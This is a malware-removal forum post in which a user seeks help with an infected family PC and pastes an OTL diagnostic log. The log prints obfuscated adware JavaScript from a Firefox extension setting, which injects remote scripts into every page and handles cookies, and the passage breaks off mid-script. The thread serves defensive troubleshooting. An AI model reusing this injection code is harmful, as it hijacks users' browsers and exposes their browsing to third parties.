Jump to content

Build Theme!
  •  
  • Infected?

WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. :D Join 91982 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!


Photo

Malwarebytes and Norton disappeared, cannot reinstall MBAM or HijackTh


  • This topic is locked This topic is locked
3 replies to this topic

#1 NikJ92

NikJ92

    Authentic Member

  • Authentic Member
  • PipPip
  • 69 posts

Posted 31 May 2014 - 12:10 AM

I'll preface this by saying this isn't my computer, at least not in the past year. Two preteens (my siblings) have been consistently downloading hacking tools and lord knows what else for the past year. Now Malwarebytes, Norton Security Suite and HijackThis (probably other programs; I can't even tell anymore) have disappeared and can't be reinstalled.

 

The computer's performance is also unbelievably slow. OTL was the only program I could run since it just runs straight from the downloadable file. These are two of the errors I got when trying to reinstall Malwarebytes:http://imgur.com/a/QLJBH Malwarebytes still has a folder in Program Files (x86), but it's locked and says I don't have permission to delete, access or run any files from it. Here are the OTL logs. Extras will be in a reply because I get an error when I try to put both.

 

Edit: Forgot to mention that Malwarebytes doesn't appear in Add/Remove programs anymore, either.

 

== OTL.txt ==


OTL logfile created on: 5/30/2014 11:12:02 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Owner\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17041)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
7.99 Gb Total Physical Memory | 7.18 Gb Available Physical Memory | 89.90% Memory free
15.98 Gb Paging File | 15.19 Gb Available in Paging File | 95.05% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 917.83 Gb Total Space | 133.70 Gb Free Space | 14.57% Space Free | Partition Type: NTFS
Drive D: | 13.68 Gb Total Space | 1.92 Gb Free Space | 14.07% Space Free | Partition Type: NTFS
Drive K: | 1.86 Gb Total Space | 0.01 Gb Free Space | 0.32% Space Free | Partition Type: FAT32
 
Computer Name: OWNER-PC | User Name: Owner | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\Owner\Desktop\OTL.exe (OldTimer Tools)
PRC - C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)
PRC - C:\Windows\SysWOW64\Windows Server\wserver.exe ()
 
 
========== Modules (No Company Name) ==========
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - (!SASCORE) -- C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE File not found
SRV:64bit: - (HitmanProScheduler) -- C:\Program Files\HitmanPro\hmpsched.exe (SurfRight B.V.)
SRV:64bit: - (IEEtwCollectorService) -- C:\Windows\SysNative\IEEtwCollector.exe (Microsoft Corporation)
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (tvnserver) -- C:\Program Files\TightVNC\tvnserver.exe (GlavSoft LLC.)
SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Acresso Software Inc.)
SRV:64bit: - (1a34a8e0) -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
SRV - (PnkBstrA) -- C:\Windows\SysWOW64\PnkBstrA.exe ()
SRV - (CltMngSvc) -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe (Client Connect LTD)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (Hamachi2Svc) -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe (LogMeIn Inc.)
SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (LMIGuardianSvc) -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe (LogMeIn, Inc.)
SRV - (ASD2Svc) -- C:\Program Files (x86)\Anvisoft\Anvi Smart Defender\ASD2Srv.exe ()
SRV - (Apache2.4) -- C:\xampp\apache\bin\httpd.exe (Apache Software Foundation)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (AnviCsbSvc) -- C:\Program Files (x86)\Anvisoft\Cloud System Booster\CSBSvc.exe (Anvisoft)
SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (CodeMeter.exe) -- C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe (WIBU-SYSTEMS AG)
SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)
SRV - (FileZillaServer) -- C:\xampp\FileZillaFTP\FileZillaServer.exe (FileZilla Project)
SRV - (IAStorDataMgrSvc) -- C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation)
SRV - (GamesAppService) -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe (WildTangent, Inc.)
SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Acresso Software Inc.)
SRV - (ACDaemon) -- C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)
SRV - (FirebirdGuardianDefaultInstance) -- C:\Program Files (x86)\Firebird\Firebird_2_1\bin\fbguard.exe (Firebird Project)
SRV - (FirebirdServerDefaultInstance) -- C:\Program Files (x86)\Firebird\Firebird_2_1\bin\fbserver.exe (Firebird Project)
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (USBSafelyRemoveService) -- C:\Program Files (x86)\USB Safely Remove\USBSRService.exe ()
SRV - (Adobe Version Cue CS4) -- C:\Program Files (x86)\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe (Adobe Systems Incorporated)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (hitmanpro37) -- C:\Windows\SysNative\drivers\hitmanpro37.sys ()
DRV:64bit: - (MBAMSwissArmy) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys (Malwarebytes Corporation)
DRV:64bit: - (AVGIDSDriver) -- C:\Windows\SysNative\drivers\avgidsdrivera.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgtdia) -- C:\Windows\SysNative\drivers\avgtdia.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgmfx64) -- C:\Windows\SysNative\drivers\avgmfx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (AVGIDSHA) -- C:\Windows\SysNative\drivers\avgidsha.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgdiska) -- C:\Windows\SysNative\drivers\avgdiska.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgldx64) -- C:\Windows\SysNative\drivers\avgldx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgloga) -- C:\Windows\SysNative\drivers\avgloga.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (Avgrkx64) -- C:\Windows\SysNative\drivers\avgrkx64.sys (AVG Technologies CZ, s.r.o.)
DRV:64bit: - (asd2fsm) -- C:\Windows\SysNative\drivers\asd2fsm.sys (Anvisoft)
DRV:64bit: - (taphss6) -- C:\Windows\SysNative\drivers\taphss6.sys (Anchorfree Inc.)
DRV:64bit: - (ssudmdm) -- C:\Windows\SysNative\drivers\ssudmdm.sys (DEVGURU Co., LTD.(www.devguru.co.kr))
DRV:64bit: - (dg_ssudbus) -- C:\Windows\SysNative\drivers\ssudbus.sys (DEVGURU Co., LTD.(www.devguru.co.kr))
DRV:64bit: - (SymEvent) -- C:\Windows\SysNative\drivers\SYMEVENT64x86.SYS (Symantec Corporation)
DRV:64bit: - (SymEFA) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symefa64.sys (Symantec Corporation)
DRV:64bit: - (SymDS) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symds64.sys (Symantec Corporation)
DRV:64bit: - (SRTSP) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\srtsp64.sys (Symantec Corporation)
DRV:64bit: - (SymNetS) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\symnets.sys (Symantec Corporation)
DRV:64bit: - (ccSet_N360) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\ccsetx64.sys (Symantec Corporation)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (SRTSPX) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\srtspx64.sys (Symantec Corporation)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (ScreamBAudioSvc) -- C:\Windows\SysNative\drivers\ScreamingBAudio64.sys (Screaming Bee LLC)
DRV:64bit: - (atikmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (amdkmdag) -- C:\Windows\SysNative\drivers\atikmdag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (SymIRON) -- C:\Windows\SysNative\drivers\N360x64\1404000.028\ironx64.sys (Symantec Corporation)
DRV:64bit: - (amdkmdap) -- C:\Windows\SysNative\drivers\atikmpag.sys (Advanced Micro Devices, Inc.)
DRV:64bit: - (tenCapture) -- C:\Windows\SysNative\drivers\tenCapture.sys (Hajo Krabbenhöft)
DRV:64bit: - (athr) -- C:\Windows\SysNative\drivers\athrx.sys (Qualcomm Atheros Communications, Inc.)
DRV:64bit: - (taphss) -- C:\Windows\SysNative\drivers\taphss.sys (AnchorFree Inc)
DRV:64bit: - (AtiHDAudioService) -- C:\Windows\SysNative\drivers\AtihdW76.sys (Advanced Micro Devices)
DRV:64bit: - (Fs_Rec) -- C:\Windows\SysNative\drivers\fs_rec.sys (Microsoft Corporation)
DRV:64bit: - (mcaudrv_simple) -- C:\Windows\SysNative\drivers\mcaudrv_x64.sys (ManyCam LLC)
DRV:64bit: - (ManyCam) -- C:\Windows\SysNative\drivers\mcvidrv_x64.sys (ManyCam LLC)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (RsFx0105) -- C:\Windows\SysNative\drivers\RsFx0105.sys (Microsoft Corporation)
DRV:64bit: - (amdsata) -- C:\Windows\SysNative\drivers\amdsata.sys (Advanced Micro Devices)
DRV:64bit: - (amdxata) -- C:\Windows\SysNative\drivers\amdxata.sys (Advanced Micro Devices)
DRV:64bit: - (HpSAMD) -- C:\Windows\SysNative\drivers\HpSAMD.sys (Hewlett-Packard Company)
DRV:64bit: - (TsUsbFlt) -- C:\Windows\SysNative\drivers\TsUsbFlt.sys (Microsoft Corporation)
DRV:64bit: - (iaStor) -- C:\Windows\SysNative\drivers\iaStor.sys (Intel Corporation)
DRV:64bit: - (RTL8167) -- C:\Windows\SysNative\drivers\Rt64win7.sys (Realtek                                            )
DRV:64bit: - (sptd) -- C:\Windows\SysNative\drivers\sptd.sys (Duplex Secure Ltd.)
DRV:64bit: - (AtiHdmiService) -- C:\Windows\SysNative\drivers\AtiHdmi.sys (ATI Technologies, Inc.)
DRV:64bit: - (PxHlpa64) -- C:\Windows\SysNative\drivers\PxHlpa64.sys (Sonic Solutions)
DRV:64bit: - (mfeavfk) -- C:\Windows\SysNative\drivers\mfeavfk.sys (McAfee, Inc.)
DRV:64bit: - (mfesmfk) -- C:\Windows\SysNative\drivers\mfesmfk.sys (McAfee, Inc.)
DRV:64bit: - (mferkdk) -- C:\Windows\SysNative\drivers\mferkdk.sys (McAfee, Inc.)
DRV:64bit: - (mfehidk) -- C:\Windows\SysNative\drivers\mfehidk.sys (McAfee, Inc.)
DRV:64bit: - (igfx) -- C:\Windows\SysNative\drivers\igdkmd64.sys (Intel Corporation)
DRV:64bit: - (amdsbs) -- C:\Windows\SysNative\drivers\amdsbs.sys (AMD Technologies Inc.)
DRV:64bit: - (LSI_SAS2) -- C:\Windows\SysNative\drivers\lsi_sas2.sys (LSI Corporation)
DRV:64bit: - (stexstor) -- C:\Windows\SysNative\drivers\stexstor.sys (Promise Technology)
DRV:64bit: - (ebdrv) -- C:\Windows\SysNative\drivers\evbda.sys (Broadcom Corporation)
DRV:64bit: - (b06bdrv) -- C:\Windows\SysNative\drivers\bxvbda.sys (Broadcom Corporation)
DRV:64bit: - (b57nd60a) -- C:\Windows\SysNative\drivers\b57nd60a.sys (Broadcom Corporation)
DRV:64bit: - (hcw85cir) -- C:\Windows\SysNative\drivers\hcw85cir.sys (Hauppauge Computer Works, Inc.)
DRV:64bit: - (hamachi) -- C:\Windows\SysNative\drivers\hamachi.sys (LogMeIn, Inc.)
DRV:64bit: - (RTL8169) -- C:\Windows\SysNative\drivers\Rtlh64.sys (Realtek Corporation                                            )
DRV:64bit: - (ENTECH64) -- C:\Windows\SysNative\drivers\Entech64.sys (EnTech Taiwan)
DRV:64bit: - (adfs) -- C:\Windows\SysNative\drivers\adfs.sys (Adobe Systems, Inc.)
DRV:64bit: - (UsbFltr) -- C:\Windows\SysNative\drivers\UsbFltr.sys (Waytech Development, Inc.)
DRV - (NAVEX15) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\VirusDefs\20131130.007\EX64.SYS (Symantec Corporation)
DRV - (eeCtrl) -- C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys (Symantec Corporation)
DRV - (NAVENG) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\VirusDefs\20131130.007\ENG64.SYS (Symantec Corporation)
DRV - (IDSVia64) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\IPSDefs\20131128.001\IDSvia64.sys (Symantec Corporation)
DRV - (BHDrvx64) -- C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\Definitions\BASHDefs\20131114.001\BHDrvx64.sys (Symantec Corporation)
DRV - (CEDRIVER60) -- C:\Program Files (x86)\Cheat Engine 6.3\dbk64.sys ()
DRV - (XFDriver64) -- C:\Program Files (x86)\Xfire2\XFDriver64.sys (XFire)
DRV - (Normandy) -- C:\Windows\SysWow64\drivers\Normandy.sys ()
DRV - (cpudrv64) -- C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys ()
DRV - (WIMMount) -- C:\Windows\SysWOW64\drivers\wimmount.sys (Microsoft Corporation)
DRV - (adfs) -- C:\Windows\SysWow64\drivers\adfs.sys (Adobe Systems, Inc.)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {9BB47C17-9C68-4BB3-B188-DD9AF0FD20}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{34D89E8B-3BF8-4591-ACE1-BFCC24ACC745}: "URL" = http://www.ask.com/w...}&l=dis&o=ushpd
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD20}: "URL" = http://isearch.fanta...q={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{AB52EDAA-AF1A-4031-A9EB-9F255A937C16}: "URL" = http://search.live.c...ms}&FORM=HPDTDF
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = about:blank
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://websearch.fas...&cc=US&unqvl=55
IE - HKLM\..\SearchScopes,DefaultScope = {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
IE - HKLM\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = http://feed.snapdo.c...q={searchTerms}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.fas...&cc=US&unqvl=55
IE - HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = about:blank
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://search.condui...A8F1137B3&SSPV=
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com
IE - HKCU\..\SearchScopes,DefaultScope = {006ee092-9658-4fd6-bd8e-a21a348e59f5}
IE - HKCU\..\SearchScopes\{006ee092-9658-4fd6-bd8e-a21a348e59f5}: "URL" = http://feed.snapdo.c...q={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = 127.0.0.1;localhost;10.*;192.168.*;127.0.0.1:895;127.0.0.1:896;<local>
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = http=127.0.0.1:8555;https=127.0.0.1:8555
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename,S: S", "WebSearch"
FF - prefs.js..browser.search.defaulturl: "http://websearch.fas...nqvl=55&l=1&q="
FF - prefs.js..browser.search.order.1: "WebSearch"
FF - prefs.js..browser.search.order.1,S: S", "WebSearch"
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.selectedEngine,S: S", "WebSearch"
FF - prefs.js..browser.search.suggest.enabled: false
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.trovi.com...8F1137B3&SSPV="
FF - prefs.js..extensions.1pSpmomrG.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1){return}}catch(e){};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1063/l.js?aoi=1311798366&pid=1063&zoneid=15224';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=315_2405&hid=17411091879117559275';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.dataf...091879117559275\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=413603&ext=save%20on&systemid=17411091879117559275\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1<window.self.location.hostname.indexOf(\"cebook.co\")?\"//cdncache-a.akamaihd.net/loaders/1543/l.js?aoi=1311798366&pid=1543&zoneid=413603&ext=save%20on&systemid=17411091879117559275\":\"//asrv-a.akamaihd.net/sd/1018/1005.js\";document.getElementsByTagName(\"head\")[0].appendChild(a);}})();;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=2';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c, B){if( B){var g=new Date;g.setTime(g.getTime()+864E5* B);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length); if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function( B){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c, B){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent( B);this.xhr.send( B)}};a.waitForTokens={};a.addScript=function(a, B){if(\"bing\"== B){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a, B){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function( B){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a, B){return window.getComputedStyle(a, B)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch( B){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild( B);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a, B){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)}, B)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a= parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url= function(b,d){for(var 